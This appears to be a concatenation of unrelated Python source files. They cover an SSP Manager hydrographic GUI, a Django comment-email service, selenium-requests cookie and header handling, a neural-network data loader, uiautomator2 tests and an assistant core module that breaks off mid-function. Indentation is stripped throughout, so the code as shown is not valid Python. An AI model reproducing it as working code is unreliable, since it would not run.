for client in range(self.prj.s.client_list.num_clients):
log.info("Testing client %s for position ..." % self.prj.s.client_list.clients[client].IP)
self.prj.ssp_recipient_ip = self.prj.s.client_list.clients[client].IP
self.prj.get_cast_from_sis()
if self.prj.km_listener.ssp:
log.info("... got SSP > valid client")
break
else:
log.info("... not valid SSP > skip this client")
if not self.prj.km_listener.ssp:
msg = "Unable to run the ref-monitor since no casts were retrieved from SIS clients"
dlg = wx.MessageDialog(None, msg, "Clients issue", wx.OK | wx.ICON_ERROR)
dlg.ShowModal() # Show it
dlg.Destroy()
return
log.info("got SIS ssp (samples %s)" % self.prj.km_listener.ssp.num_entries)
if self.state == self.gui_state['CLOSED']:
# Maybe when running in this state, the requested SVP is
# loaded into the SVP Editor? This is behavior is inconsistent
# with other modes (OPEN, SERVER) where the profile is already loaded.
# Perhaps should force user to open a profile from SIS?
# Could then limit ability to launch refraction monitor from the
# OPEN and SERVER states and have it disabled in the CLOSED state.
log.info("we are CLOSED!")
ssp = self.prj.km_listener.ssp.convert_ssp()
if self.ref_monitor:
self.ref_monitor.set_ssp(ssp)
elif (self.state == self.gui_state['OPEN']) or (self.state == self.gui_state['SERVER']):
if self.ref_monitor:
self.ref_monitor.set_ssp(self.prj.ssp_data)
self.ref_monitor.OnShow()
def on_tools_user_inputs(self, evt):
self.inputs_viewer.OnShow()
def on_tools_modify_settings(self, evt):
self.settings_tool = ssp_settings.SSPSettings(parent=None)
self.settings_tool.Show()
def on_tools_view_settings(self, evt):
self.settings_viewer.OnShow()
def on_tools_reload_settings(self, evt):
self.prj.s.load_settings_from_db()
# ### SERVER ###
def on_tools_server_start(self, event):
"""start the server mode"""
dlg = wx.MessageDialog(self,
"Do you really want to start the Server Mode?\n\n"
"The Server Mode creates SSPs based on oceanographic models for SIS.\n"
"Thus, it is meant for use in transit, NOT for systematic seabed mapping.\n"
"This Mode will OVERWRITE the current SIS SSP.\n",
"Server Mode", wx.OK | wx.CANCEL | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_CANCEL:
return
# - check and ask for draft
if not self.prj.vessel_draft:
self.get_transducer_draft()
# if still not available, return
if self.prj.vessel_draft is None:
return
else: # store since it can change with updates
self.prj.server.server_vessel_draft = self.prj.vessel_draft
log.info("Starting server")
# - start the server
if self.prj.server.check_settings():
self._update_state(self.gui_state["SERVER"])
self.p.display_woa = True
if self.prj.has_ssp_loaded:
self.prj.clean_project()
self.clear_app()
else:
dlg = wx.MessageDialog(self, "Unable to start the Server Mode", "Server Mode", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
self.prj.server.set_refraction_monitor(self.ref_monitor)
threading.Thread(target=self.prj.server.run).start()
# Now set up a timer for cast plot updates
self.prj.server_timer = TimerThread(self.monitor_server, timing=1)
self.prj.server_timer.start()
def on_tools_server_send(self, e):
log.info("forcing server to send profile NOW!")
self.prj.server.force_send = True
def monitor_server(self):
if self.prj.server.stopped_on_error:
self.prj.server.stop(by_thread=True)
if (not self.prj.has_sippican_to_process) and (not self.prj.has_mvp_to_process):
msg = "Server stopped with message: %s" % self.prj.server.error_message
dlg = wx.MessageDialog(None, msg, "Acknowledge", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
self.clear_app()
else:
if self.prj.server.update_plot:
self._update_plot()
self.prj.server.update_plot = False
def on_tools_server_stop(self, e):
dlg = wx.MessageDialog(self, "Do you really want to stop the server?", "Confirm Server Stop",
wx.OK | wx.CANCEL | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_CANCEL:
return
log.info("User instructed to stop the Server Mode")
self.prj.server.stop()
self.clear_app()
def on_tools_server_log_metadata(self, event):
"""Activate the logging of the server metadata"""
flag = self.ServerLogMetadata.IsChecked()
if flag:
self.prj.activate_server_logging_on_db()
else:
self.prj.deactivate_server_logging_on_db()
# ### REF CAST ###
def on_tools_set_reference_cast(self, evt):
"""set a reference cast"""
log.info("set as reference cast:\n%s" % self.prj.ssp_data)
self.prj.ssp_reference = copy.deepcopy(self.prj.ssp_data)
self.prj.ssp_reference_filename = self.prj.filename
self._update_plot()
def on_tools_edit_reference_cast(self, evt):
if not self.prj.ssp_reference:
return
if self.prj.has_ssp_loaded:
msg = 'Must close currently loaded profile to edit the reference profile. Proceed?'
dlg = wx.MessageDialog(None, msg, "Question", wx.OK | wx.CANCEL | wx.ICON_QUESTION)
result = dlg.ShowModal() # Show it
dlg.Destroy()
if result == wx.ID_CANCEL:
return
self.prj.clean_project()
self.clear_app()
self.prj.ssp_data = copy.deepcopy(self.prj.ssp_reference)
self.prj.filename = self.prj.ssp_reference_filename
self.prj.u.filename_prefix = os.path.splitext(self.prj.filename)[0]
self.prj.ssp_woa, self.prj.ssp_woa_min, self.prj.ssp_woa_max = self.prj.woa09_atlas.query(
self.prj.ssp_data.latitude,
self.prj.ssp_data.longitude,
self.prj.ssp_data.date_time)
self.prj.has_ssp_loaded = True
self.prj.surface_speed_applied = False
self.prj.ssp_applied_depth = 0
self._update_state(self.gui_state['OPEN'])
self._update_plot()
self.status_message = "Loaded %s" % self.prj.filename
def on_tools_clear_reference_cast(self, evt):
self.prj.ssp_reference = None
self.prj.ssp_reference_filename = None
self._update_plot()
# ####### HELP ######
def on_help_manual(self, event):
""" Open manual """
# manual_path = os.path.abspath(os.path.join(self.here, os.path.pardir, "docs", "manual.pdf"))
# if not os.path.isfile(manual_path):
# log.warning("missing manual at: %s" % manual_path)
# return
# log.info("open manual: %s" % manual_path)
# Helper.explore_folder(manual_path)
# Open the url with the online documentation for SSP Manager
import webbrowser
webbrowser.open('http://giumas.github.io/hyo_ssp_manager/latest/index.html')
def on_help_about(self, e):
"""Info about the application"""
import platform
from hydroffice import base
from hydroffice import ssp
current_year = dt.datetime.now().strftime("%Y")
dlg = wx.AboutDialogInfo()
dlg.SetName("SSP Manager")
dlg.SetVersion(self.version)
dlg.SetLicense(self.license)
dlg.SetIcon(wx.Icon(os.path.join(self.here, "media", "ccom.png"), wx.BITMAP_TYPE_PNG))
about_description = "SSP Manager processes XBT/SVP/CTD data for being used by \n" \
"acoustic systems.\n\n" \
"This work is/has been funded by:\n" \
" - NOAA grant NA10NOS4000073\n" \
" - NSF grant 1150574\n\n" \
"For bugs and unsupported formats, please send an email \n" \
"(with attached the data files to reproduce and troubleshoot \n" \
"the issue!) to:\n" \
" - hydroffice.ssp_manager@ccom.unh.edu\n\n" \
"For code contributions and general comments, write to:\n" \
" - gmasetti@ccom.unh.edu\n" \
" - brc@ccom.unh.edu\n" \
" - matthew.wilson@noaa.gov\n" \
"Contributors:\n" \
" - glen.rice@noaa.gov\n\n" \
"Environment:\n" \
" - os: %s [%sbit]\n" \
" - python: %s [%sbit]\n" \
" - wxPython: %s\n" \
" - matplotlib: %s\n" \
" - hydroffice.base: %s\n" \
" - hydroffice.ssp: %s" % \
(
os.name, "64" if Helper.is_64bit_os() else "32",
platform.python_version(), "64" if Helper.is_64bit_python() else "32",
wx.__version__,
matplotlib.__version__,
base.__version__,
ssp.__version__
)
dlg.SetDescription(about_description)
dlg.SetCopyright("%s (C) UNH/CCOM" % current_year)
wx.AboutBox(dlg)
################################################
### USER DIALOGS ###
def get_transducer_draft(self):
"""Ask user for transducer draft"""
if self.prj.km_listener.xyz88:
self.prj.vessel_draft = self.prj.km_listener.xyz88.transducer_draft
return
dlg = wx.TextEntryDialog(None, 'Enter the transducer draft', 'Transducer draft')
if dlg.ShowModal() == wx.ID_CANCEL:
self.prj.vessel_draft = None
dlg.Destroy()
return
dlg_value = dlg.GetValue()
dlg.Destroy()
try:
self.prj.vessel_draft = float(dlg_value)
except ValueError:
msg = "Invalid draft entry: %s" % dlg_value
dlg = wx.MessageDialog(None, msg, "Invalid value", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
self.prj.vessel_draft = None
return
def get_position(self):
"""Ask user for position, if not available"""
latitude = None
longitude = None
if self.prj.km_listener.nav:
msg = "Geographic location required for pressure/depth conversion and atlas lookup.\n" \
"Use geographic position from SIS?\nChoose 'no' to enter position manually."
dlg = wx.MessageDialog(None, msg, "Question", wx.YES | wx.NO | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_YES:
latitude = self.prj.km_listener.nav.latitude
longitude = self.prj.km_listener.nav.longitude
msg = 'User set cast position %lf %lf from SIS input' % (latitude, longitude)
log.info(msg)
elif result == wx.ID_NO:
latitude = None
longitude = None
if not latitude or not longitude:
# latitude
while True:
dlg = wx.TextEntryDialog(None, "Geographic location required for pressure/depth conversion and atlas "
"lookup.Enter latitude as signed decimal degrees (-10.123).",
"Latitude")
if dlg.ShowModal() == wx.ID_CANCEL:
dlg.Destroy()
return [None, None]
else:
try:
latitude = float(dlg.GetValue())
dlg.Destroy()
break
except ValueError:
pass
# longitude
while True:
dlg = wx.TextEntryDialog(None, "Geographic location required for pressure/depth conversion and atlas "
"lookup. Enter longitude as signed decimal degrees (-50.123).",
"Longitude")
if dlg.ShowModal() == wx.ID_CANCEL:
dlg.Destroy()
return [None, None]
else:
try:
longitude = float(dlg.GetValue())
dlg.Destroy()
break
except ValueError:
pass
msg = 'Manual user input position: %lf %lf' % (latitude, longitude)
log.info(msg)
return [latitude, longitude]
def get_date(self):
"""Ask user for date, if not available"""
# SIS specific
if self.prj.km_listener.nav:
msg = "Date required for database lookup.\nUse date from SIS?\nChoose 'no' to enter date manually."
dlg = wx.MessageDialog(None, msg, "Question", wx.YES | wx.NO | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_YES:
date = self.prj.km_listener.nav.dg_time
if date:
msg = 'Cast date %s from SIS input' % date
log.info(msg)
return date
else:
msg = 'Invalid date in SIS datagram'
log.info(msg)
# date from the machine clock
msg = "Date required for database lookup.\nUse UTC date from this machine?\nChoose 'no' to enter date manually."
dlg = wx.MessageDialog(None, msg, "Question", wx.YES | wx.NO | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_YES:
date = dt.datetime.utcnow()
msg = 'User set cast date %s from computer clock' % date
log.info(msg)
return date
# user input date / time
while True:
msg = "Date required for database lookup.\nPlease enter date (YYYY-MM-DD)."
dlg = wx.TextEntryDialog(None, msg, 'Date')
if dlg.ShowModal() == wx.ID_CANCEL:
return None
else:
date_string = dlg.GetValue()
dlg.Destroy()
try:
dt.datetime(int(date_string[0:4]), int(date_string[5:7]), int(date_string[8:10]))
break
except ValueError:
continue
while True:
msg = "Date required for database lookup.\nPlease enter time (HH:MM:SS)."
dlg = wx.TextEntryDialog(None, msg, 'Enter Date')
if dlg.ShowModal() == wx.ID_CANCEL:
return None
else:
cast_time = dlg.GetValue()
dlg.Destroy()
try:
date = dt.datetime(int(date_string[0:4]), int(date_string[5:7]), int(date_string[8:10]),
int(cast_time[0:2]), int(cast_time[3:5]), int(cast_time[6:8]), 0)
msg = 'User input cast date %s' % date
log.info(msg)
return date
except ValueError:
pass
# ###############################################
# ### DEBUGGING ###
def _update_state(self, state):
for item in sspmanager_ui.MENUS_ALL: # Enable ALL the menu items
self.GetMenuBar().FindItemById(item).Enable(True)
# selectively disable some based on the state
if state == self.gui_state["CLOSED"]:
for item in sspmanager_ui.MENUS_DISABLED_ON_CLOSED:
self.GetMenuBar().FindItemById(item).Enable(False)
if self.ref_monitor:
self.ref_monitor.set_ssp(None)
self.ref_monitor.hide()
elif state == self.gui_state["OPEN"]:
for item in sspmanager_ui.MENUS_DISABLED_ON_OPEN:
self.GetMenuBar().FindItemById(item).Enable(False)
if self.prj.ssp_data.sensor_type != Dicts.sensor_types["XBT"]:
self.ProcessLoadSal.Enable(False)
if self.prj.ssp_data.sensor_type != Dicts.sensor_types["XSV"] \
and self.prj.ssp_data.sensor_type != Dicts.sensor_types["SVP"]:
self.ProcessLoadTempSal.Enable(False)
if self.ref_monitor:
self.ref_monitor.set_ssp(self.prj.ssp_data)
elif state == self.gui_state["SERVER"]:
for item in sspmanager_ui.MENUS_DISABLED_ON_SERVER:
self.GetMenuBar().FindItemById(item).Enable(False)
if self.ref_monitor:
self.ref_monitor.set_ssp(None)
else:
raise SspError("Passed wrong state type: %s is %s" % (state, type(state)))
self.state = state
def _update_status(self):
"""Provide info from SIS to the user through status bar"""
self.frame_statusbar.SetStatusText(self.status_message, 0)
# in case that the SIS listener is absent
if self.prj.km_listener is None:
self.frame_statusbar.SetStatusText("Disabled SIS listener", 1)
return
sis_info_str = str()
if self.prj.km_listener.nav is not None:
# time stamp
if self.prj.km_listener.nav.dg_time is not None:
sis_info_str = "%s, " % (self.prj.km_listener.nav.dg_time.strftime("%H:%M:%S"))
else:
sis_info_str = "NA, "
# position
if (self.prj.km_listener.nav.latitude is not None) and \
(self.prj.km_listener.nav.longitude is not None):
latitude = self.prj.km_listener.nav.latitude
if latitude >= 0:
letter = "N"
else:
letter = "S"
lat_min = float(60 * math.fabs(latitude - int(latitude)))
lat_str = "%02d\N{DEGREE SIGN}%7.3f'%s" % (int(math.fabs(latitude)), lat_min, letter)
longitude = self.prj.km_listener.nav.longitude
if longitude < 0:
letter = "W"
else:
letter = "E"
lon_min = float(60 * math.fabs(longitude - int(longitude)))
lon_str = "%03d\N{DEGREE SIGN}%7.3f'%s" % (int(math.fabs(longitude)), lon_min, letter)
sis_info_str += "(%s, %s), " % (lat_str, lon_str)
else:
sis_info_str += "(NA, NA), "
if self.prj.km_listener.xyz88 is not None:
if self.prj.km_listener.xyz88.sound_speed is not None:
sis_info_str += '%.1f m/s, ' % self.prj.km_listener.xyz88.sound_speed
self.prj.surface_sound_speed = self.prj.km_listener.xyz88.sound_speed
self.prj.vessel_draft = self.prj.km_listener.xyz88.transducer_draft
else:
sis_info_str += 'NA m/s, '
self.prj.surface_sound_speed = None
self.prj.vessel_draft = None
if (self.prj.km_listener.xyz88.number_beams is not None) and \
(self.prj.km_listener.xyz88.depth is not None) and \
(self.prj.km_listener.xyz88.transducer_draft is not None) and \
(self.prj.km_listener.xyz88.detection_information is not None):
mean_depth = 0.0
depth_count = 0
for beam in range(self.prj.km_listener.xyz88.number_beams):
if int(self.prj.km_listener.xyz88.detection_information[beam]) & 0x80 != 0:
# We skip beams without valid detections
continue
mean_depth = mean_depth + self.prj.km_listener.xyz88.depth[beam]
depth_count += 1
if depth_count > 0:
mean_depth = mean_depth / depth_count + self.prj.km_listener.xyz88.transducer_draft
sis_info_str += '%.1f m' % mean_depth
self.prj.mean_depth = mean_depth
else:
sis_info_str += 'NA m'
self.prj.mean_depth = None
else:
sis_info_str += 'XYZ88 NA [Pinging?]'
self.prj.mean_depth = None
self.prj.surface_sound_speed = None
self.prj.vessel_draft = None
self.frame_statusbar.SetStatusText(sis_info_str, 1)
|
email.py
|
from threading import Thread
from django.contrib.sites.shortcuts import get_current_site
from django.core import signing
from django.core.mail import EmailMultiAlternatives, get_connection
from django.template import loader
from django.urls import reverse
from comment.conf import settings
from comment.messages import EmailInfo
from comment.models import Follower
from comment.utils import get_username_for_comment
class DABEmailService(object):
def __init__(self, comment, request):
self.comment = comment
self.request = request
self.sender = settings.COMMENT_FROM_EMAIL
self.is_html = settings.COMMENT_SEND_HTML_EMAIL
self._email_thread = None
def get_msg_context(self, **context):
context['comment'] = self.comment
context['site'] = get_current_site(self.request)
context['contact'] = settings.COMMENT_CONTACT_EMAIL
return context
def get_message(self, subject, body, receivers, html_msg=None):
msg = EmailMultiAlternatives(subject, body, self.sender, receivers)
if html_msg:
msg.attach_alternative(html_msg, 'text/html')
return msg
def send_messages(self, messages):
connection = get_connection() # Use default email connection
self._email_thread = Thread(target=connection.send_messages, args=(messages,))
self._email_thread.start()
def get_message_templates(self, text_template, html_template, msg_context):
text_msg_template = loader.get_template(text_template)
text_msg = text_msg_template.render(msg_context)
html_msg = None
if self.is_html:
html_msg_template = loader.get_template(html_template)
html_msg = html_msg_template.render(msg_context)
return text_msg, html_msg
def send_confirmation_request(self, api=False):
comment_dict = self.comment.to_dict()
receivers = [comment_dict['email']]
key = signing.dumps(comment_dict, compress=True)
text_template = 'comment/anonymous/confirmation_request.txt'
html_template = 'comment/anonymous/confirmation_request.html'
subject = EmailInfo.CONFIRMATION_SUBJECT
if api:
confirmation_url = f'/api/comments/confirm/{key}/'
else:
confirmation_url = reverse('comment:confirm-comment', args=[key])
context = self.get_msg_context(confirmation_url=confirmation_url)
text_msg, html_msg = self.get_message_templates(text_template, html_template, context)
msg = self.get_message(subject, text_msg, receivers, html_msg=html_msg)
self.send_messages([msg])
def get_thread(self):
if self.comment.is_parent:
return self.comment.content_object
return self.comment.parent
def get_thread_name(self):
if self.comment.is_parent:
return str(self.comment.content_object)
return str(self.comment.parent).split(':')[0]
def get_subject_for_notification(self, thread_name):
username = get_username_for_comment(self.comment)
return EmailInfo.NOTIFICATION_SUBJECT.format(username=username, thread_name=thread_name)
def get_messages_for_notification(self, thread_name, receivers):
text_template = 'comment/notifications/notification.txt'
html_template = 'comment/notifications/notification.html'
subject = self.get_subject_for_notification(thread_name)
messages = []
for receiver in receivers:
context = self.get_msg_context(thread_name=thread_name, receiver=receiver.username)
text_msg, html_msg = self.get_message_templates(text_template, html_template, context)
messages.append(self.get_message(subject, text_msg, [receiver.email], html_msg=html_msg))
return messages
def send_notification_to_followers(self):
thread = self.get_thread()
followers = Follower.objects.filter_for_model_object(thread).exclude(email=self.comment.email)
if not followers:
return
thread_name = self.get_thread_name()
messages = self.get_messages_for_notification(thread_name, followers)
self.send_messages(messages)
|
request.py
|
import json
import socket
import threading
import warnings
import requests
import six
import tldextract
from selenium.common.exceptions import NoSuchWindowException, WebDriverException
from six.moves import BaseHTTPServer
from six.moves.urllib.parse import urlparse
FIND_WINDOW_HANDLE_WARNING = (
'Created window handle could not be found reliably. Using less reliable '
'alternative method. JavaScript redirects are not supported and an '
'additional GET request might be made for the requested URL.'
)
headers = None
update_headers_mutex = threading.Semaphore()
update_headers_mutex.acquire()
class SeleniumRequestsException(Exception):
pass
# Using a global value to pass around the headers dictionary reference seems to be the easiest way to get access to it,
# since the HTTPServer doesn't keep an object of the instance of the HTTPRequestHandler
class HTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
global headers
headers = requests.structures.CaseInsensitiveDict(self.headers if six.PY3 else self.headers.dict)
update_headers_mutex.release()
self.send_response(200)
self.end_headers()
# Immediately close the window as soon as it is loaded
self.wfile.write(six.b('<script type="text/javascript">window.close();</script>'))
# Suppress unwanted logging to stderr
def log_message(self, format, *args):
pass
def get_unused_port():
socket_ = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_.bind(('', 0))
address, port = socket_.getsockname()
socket_.close()
return port
def get_webdriver_request_headers(webdriver):
# There's a small chance that the port was taken since the call of get_unused_port(), so make sure we try as often
# as needed
while True:
port = get_unused_port()
try:
server = BaseHTTPServer.HTTPServer(('', port), HTTPRequestHandler)
break
except socket.error:
pass
threading.Thread(target=server.handle_request).start()
original_window_handle = webdriver.current_window_handle
webdriver.execute_script("window.open('http://127.0.0.1:%d/', '_blank');" % port)
update_headers_mutex.acquire()
# Not optional: Make sure that the webdriver didn't switch the window handle to the newly opened window. Behaviors
# of different webdrivers seem to differ here. Workaround for Firefox: If a new window is opened via JavaScript as a
# new tab, requesting self.current_url never returns. Explicitly switching to the current window handle again seems
# to fix this issue.
webdriver.switch_to.window(original_window_handle)
global headers
headers_ = headers
headers = None
# Remove the host header, which will simply contain the localhost address of the HTTPRequestHandler instance
del headers_['host']
return headers_
def prepare_requests_cookies(webdriver_cookies):
return {str(cookie['name']): str(cookie['value']) for cookie in webdriver_cookies}
def get_tld(url):
components = tldextract.extract(url)
# Since the registered domain could not be extracted, assume that it's simply an IP and strip away the protocol
# prefix and potentially trailing rest after "/" away. If it isn't, this fails gracefully for unknown domains, e.g.:
# "http://domain.onion/" -> "domain.onion". If it doesn't look like a valid address at all, return the URL
# unchanged.
if not components.registered_domain:
try:
return url.split('://', 1)[1].split(':', 1)[0].split('/', 1)[0]
except IndexError:
return url
return components.registered_domain
def find_window_handle(webdriver, predicate):
original_window_handle = webdriver.current_window_handle
if predicate(webdriver):
return original_window_handle
# Start search beginning with the most recently added window handle: the chance is higher that this is the correct
# one in most cases
for window_handle in reversed(webdriver.window_handles):
if window_handle == original_window_handle:
continue
# This exception can occur if the window handle was closed between accessing the window handles and attempting
# to switch to it, in which case it can be silently ignored.
try:
webdriver.switch_to.window(window_handle)
except NoSuchWindowException:
continue
if predicate(webdriver):
return window_handle
# Simply switch back to the original window handle and return None if no matching window handle was found
webdriver.switch_to.window(original_window_handle)
def make_match_domain_predicate(domain):
def predicate(webdriver):
try:
return get_tld(webdriver.current_url) == domain
# This exception can occur if the current window handle was closed
except NoSuchWindowException:
pass
return predicate
class RequestsSessionMixin(object):
def __init__(self, *args, **kwargs):
super(RequestsSessionMixin, self).__init__(*args, **kwargs)
self.requests_session = requests.Session()
self.__has_webdriver_request_headers = False
self.__is_phantomjs = self.name == 'phantomjs'
self.__is_phantomjs_211 = self.__is_phantomjs and self.capabilities['version'] == '2.1.1'
# Workaround for PhantomJS bug: https://github.com/ariya/phantomjs/issues/14047
def add_cookie(self, cookie_dict):
try:
super(RequestsSessionMixin, self).add_cookie(cookie_dict)
except WebDriverException as exception:
details = json.loads(exception.msg)
if not (self.__is_phantomjs_211 and details['errorMessage'] == 'Unable to set Cookie'):
raise
def request(self, method, url, **kwargs):
if not self.__has_webdriver_request_headers:
# Workaround for Chrome bug: https://bugs.chromium.org/p/chromedriver/issues/detail?id=1077
if self.name == 'chrome':
window_handles_before = len(self.window_handles)
self.requests_session.headers = get_webdriver_request_headers(self)
# Wait until the newly opened window handle is closed again, to prevent switching to it just as it is
# about to be closed
while len(self.window_handles) > window_handles_before:
pass
else:
self.requests_session.headers = get_webdriver_request_headers(self)
self.__has_webdriver_request_headers = True
# Delete cookies from the request headers, to prevent overwriting manually set cookies later. This should
# only happen when the webdriver has cookies set for the localhost
if 'cookie' in self.requests_session.headers:
del self.requests_session.headers['cookie']
original_window_handle = None
opened_window_handle = None
requested_tld = get_tld(url)
if not get_tld(self.current_url) == requested_tld:
original_window_handle = self.current_window_handle
# Try to find an existing window handle that matches the requested top-level domain
predicate = make_match_domain_predicate(requested_tld)
window_handle = find_window_handle(self, predicate)
# Create a new window handle manually in case it wasn't found
if not window_handle:
previous_window_handles = set(self.window_handles)
components = urlparse(url)
self.execute_script("window.open('%s://%s/', '_blank');" % (components.scheme, components.netloc))
difference = set(self.window_handles) - previous_window_handles
if len(difference) == 1:
opened_window_handle = difference.pop()
self.switch_to.window(opened_window_handle)
else:
warnings.warn(FIND_WINDOW_HANDLE_WARNING)
opened_window_handle = find_window_handle(self, predicate)
# Window handle could not be found during first pass. There might have been a redirect and the top-
# level domain changed
if not opened_window_handle:
response = self.requests_session.get(url, stream=True)
current_tld = get_tld(response.url)
if current_tld != requested_tld:
predicate = make_match_domain_predicate(current_tld)
opened_window_handle = find_window_handle(self, predicate)
if not opened_window_handle:
raise SeleniumRequestsException('window handle could not be found')
# Acquire WebDriver's cookies and merge them with potentially passed cookies
cookies = prepare_requests_cookies(self.get_cookies())
if 'cookies' in kwargs:
cookies.update(kwargs['cookies'])
kwargs['cookies'] = cookies
response = self.requests_session.request(method, url, **kwargs)
# Set cookies received from the HTTP response in the WebDriver
current_tld = get_tld(self.current_url)
for cookie in response.cookies:
# Setting domain to None automatically instructs most webdrivers to use the domain of the current window
# handle
cookie_dict = {'domain': None, 'name': cookie.name, 'value': cookie.value, 'secure': cookie.secure}
if cookie.expires:
cookie_dict['expiry'] = cookie.expires
if cookie.path_specified:
cookie_dict['path'] = cookie.path
# Workaround for PhantomJS bug: PhantomJS doesn't accept None
if self.__is_phantomjs:
cookie_dict['domain'] = current_tld
self.add_cookie(cookie_dict)
# Don't keep cookies in the Requests session, only use the WebDriver's
self.requests_session.cookies.clear()
if opened_window_handle:
self.close()
if original_window_handle:
self.switch_to.window(original_window_handle)
return response
|
loader.py
|
# Copyright 2018 Jörg Franke
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import threading
from queue import Queue
import numpy as np
from adnc.data.utils.batch_generator import BatchGenerator
from adnc.data.tasks.repeat_copy import CopyTask
from adnc.data.tasks.cnn_rc import ReadingComprehension
from adnc.data.tasks.babi import bAbI
class DataLoader():
"""
The data loader loads and process the datasets and provides iterators for training or inference.
"""
def __init__(self, config, word_dict=None, re_word_dict=None):
"""
Args:
config: dict with the config to pre-process the dataset
word_dict: dict with word-feature pairs, optional
re_word_dict: dict with feature-word pairs, optional
"""
self.config = config
if config['data_set'] == 'copy_task':
self.dataset = CopyTask(self.config)
elif config['data_set'] == 'cnn':
self.dataset = ReadingComprehension(self.config)
elif config['data_set'] == 'babi':
self.dataset = bAbI(self.config, word_dict, re_word_dict)
@property
def vocabulary_size(self):
return self.dataset.vocabulary_size
@property
def x_size(self):
return self.dataset.x_size
@property
def y_size(self):
return self.dataset.y_size
def batch_amount(self, set_name):
"""
Calculates the batch amount given a batch size
Args:
set_name: str, name of dataset (train, test, valid)
Returns: int, number of batches
"""
if 'max_len' in self.config.keys():
return np.floor(
self.dataset.sample_amount(set_name, self.config['max_len']) / self.config['batch_size']).astype(int)
else:
return np.floor(self.dataset.sample_amount(set_name) / self.config['batch_size']).astype(int)
def sample_amount(self, set_name, ):
return self.dataset.sample_amount(set_name)
def get_sample(self, set, number):
return self.dataset.get_sample(set, number)
def decode_output(self, sample, prediction):
return self.dataset.decode_output(sample, prediction)
def get_data_loader(self, set_name, shuffle=True, max_len=False, batch_size=None, get_shuffle_option=False):
"""
Provides a data iterator of the given dataset.
Args:
set_name: str, name of dataset
shuffle: bool, shuffle set or not
max_len: int, max length in time of sample
batch_size: int, batch size
get_shuffle_option: bool, returns shuffle function
Returns: iter, iterator over dataset
"""
if batch_size == None:
batch_size = self.config['batch_size']
stream_loader_pre = BatchGenerator(self.dataset, set_name, batch_size, shuffle=shuffle, max_len=max_len)
stream_loader = self._generate_in_background(stream_loader_pre, num_cached=self.config['num_chached'],
threads=self.config['threads'])
if get_shuffle_option:
return stream_loader, stream_loader_pre.shuffle_order
else:
return stream_loader
@staticmethod
def _generate_in_background(batch_gen, num_cached=10, threads=1):
"""
Starts threads with parallel batch generator for faster iteration
Args:
batch_gen: func, the batch generator
num_cached: int, numb of caches batches
threads: int, numb of parallel threads
Returns: iter, iterator over dataset
"""
queue = Queue(maxsize=num_cached)
sentinel = object()
def producer():
for item in batch_gen:
queue.put(item)
queue.put(sentinel)
threads = [threading.Thread(target=producer) for _ in range(threads)]
for t in threads:
t.daemon = True
t.start()
item = queue.get()
while item is not sentinel:
yield item
item = queue.get()
|
test_utils.py
|
# coding: utf-8
#
import time
import threading
import pytest
from uiautomator2 import utils
def test_list2cmdline():
testdata = [
[("echo", "hello"), "echo hello"],
[("echo", "hello&world"), "echo 'hello&world'"],
[("What's", "your", "name?"), """'What'"'"'s' your 'name?'"""]
]
for args, expect in testdata:
cmdline = utils.list2cmdline(args)
assert cmdline == expect, "Args: %s, Expect: %s, Got: %s" % (args, expect, cmdline)
def test_inject_call():
def foo(a, b, c=2):
return a*100+b*10+c
ret = utils.inject_call(foo, a=2, b=4)
assert ret == 242
with pytest.raises(TypeError):
utils.inject_call(foo, 2)
def test_method_threadsafe():
class A:
n = 0
@utils.method_threadsafe
def call(self):
v = self.n
time.sleep(.5)
self.n = v + 1
a = A()
th1 = threading.Thread(name="th1", target=a.call)
th2 = threading.Thread(name="th2", target=a.call)
th1.start()
th2.start()
th1.join()
th2.join()
assert 2 == a.n
|
core.py
|
import subprocess, socketserver, socket, argparse, re, os, selflib, pipes, time, configparser
from multiprocessing import Process
from selflib import *
# These values are set in load_config, from the values in selflib.py. just here for global reference. Maybe move to main?
COMMAND = "python3" # this is just because every skill is python. Ideally, this wont need to preface every command. Maybe just use a shebang?
base = "./" # Well. This needs to be scrubbed... what should it be?
stt = base+"sphinx-server.py"
PARSER = base+"padatious-parser.py" # this conflicts w/ arg parser. be careful changing it
version = "0.1.0"
database = base+"sqldatabase.py"
formatter = base+"command-formatter.py"
gui = base+"gui"
#CONFIG = "~/.config/assistant/core.conf" # The config directory should probably be broadcast
#LOG_DIR = "/var/log/assistant/" # this is a goal. Not set up yet
# this is the pipeline the message goes through. to hack this, just inject a small method that checks the current spot in the path and injects your custom command
message_path = ["parser","command-formatter","command"] # you can hack in extra modules here if you'd like
''' To have assistant handle non text data (such as audio or pictures), just stdout pipe the binary form into message, and give it a custom component tag to run'''
class AssistantUDPHandler(socketserver.BaseRequestHandler):
# This is the handler function. it must be polling somehow <- The server is an endless loop
def handle(self):
notify("Some data was recieved!")
data = self.request[0].strip() # remove that trailing '\n' that is added for some reason...
socket = self.request[1]
notify("{} wrote:".format(self.client_address[0]))
notify(data)
data = data.decode('utf-8')
message = deserialize(data) # this throws error for non kvp data. if it's untagged, it puts it in... [original]
loud_notify("MESSAGE", message) #<- this is where the message is coming from...
post_office(message) # Determine where the message should go from here
def log_and_tag(message):
# tag original data
# log original data
message["original"] = message["payload"] # this may be redundant, since it's also the first in the chain
message["id"] = 1 # but actually, it should generate a new ID based on the table its being logged into
logger = Process(target=log,args=(message,))
logger.run()
return message
def post_office(message): # this is the primary routing service
# I can expect it to be
notify("sorting in the post office")
# verify id
